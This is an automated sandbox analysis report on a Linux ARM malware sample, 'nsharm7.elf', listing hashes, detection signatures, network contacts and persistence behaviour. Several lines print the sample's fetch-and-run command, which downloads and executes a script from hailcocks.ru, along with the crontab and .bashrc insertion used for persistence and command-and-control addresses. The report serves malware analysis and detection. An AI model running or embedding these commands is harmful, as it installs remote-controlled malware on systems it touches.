Linux Analysis Report
nsharm7.elf

Overview

General Information

Sample name: nsharm7.elf
Analysis ID: 1542859
MD5: ca210ee9b185a078d977e3f9f421e2da
SHA1: 99a8fdf8489095caf3ba316f5f75561400bb64d5
SHA256: d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125
Tags: elf, user-abuse_ch

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

Source: nsharm7.elf ReversingLabs: Detection: 23%
Source: .bashrc.12.dr String: cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: bot.conf.12.dr String: exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: tmp.QYPaEb.18.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: global traffic TCP traffic: 192.168.2.15:46308 -> 88.151.195.22:8623
Source: global traffic TCP traffic: 192.168.2.15:51746 -> 81.29.149.178:19313
Source: global traffic TCP traffic: 192.168.2.15:44828 -> 193.233.193.45:20610
Source: global traffic TCP traffic: 192.168.2.15:45492 -> 91.149.218.232:11299
Source: /tmp/nsharm7.elf (PID: 5549) Socket: 127.0.0.1:1172
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown UDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknown UDP traffic detected without corresponding DNS query: 65.21.1.106
Source: global traffic DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.QYPaEb.18.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal60.troj.linELF@0/3@8/0

Persistence and Installation Behavior

Source: /bin/sh (PID: 5555) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5554) Crontab executable: /usr/bin/crontab -> crontab -
Source: /tmp/nsharm7.elf (PID: 5549) File written: /root/.bashrc
Source: /usr/bin/crontab (PID: 5554) File: /var/spool/cron/crontabs/tmp.QYPaEb
Source: /usr/bin/crontab (PID: 5554) File: /var/spool/cron/crontabs/root
Source: /tmp/nsharm7.elf (PID: 5549) File: /root/.bashrc
Source: /tmp/nsharm7.elf (PID: 5551) Shell command executed: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
Source: /tmp/nsharm7.elf (PID: 5556) Shell command executed: /bin/sh -c "/sbin/initctl start bot"
Source: submitted sample Stderr: no crontab for root/bin/sh: 1: /sbin/initctl: not found: exit code = 0
Source: /tmp/nsharm7.elf (PID: 5549) Queries kernel information via 'uname'
Source: nsharm7.elf, 5549.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5559.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5601.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: nsharm7.elf, 5549.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5559.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp Binary or memory string: Rx86_64/usr/bin/qemu-arm/tmp/nsharm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nsharm7.elf
Source: nsharm7.elf, 5549.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5559.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5601.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: nsharm7.elf, 5549.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5559.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
[IP distribution map legend (figure not included): No. of IPs < 25%; 25% to 50%; 50% to 75%; > 75%]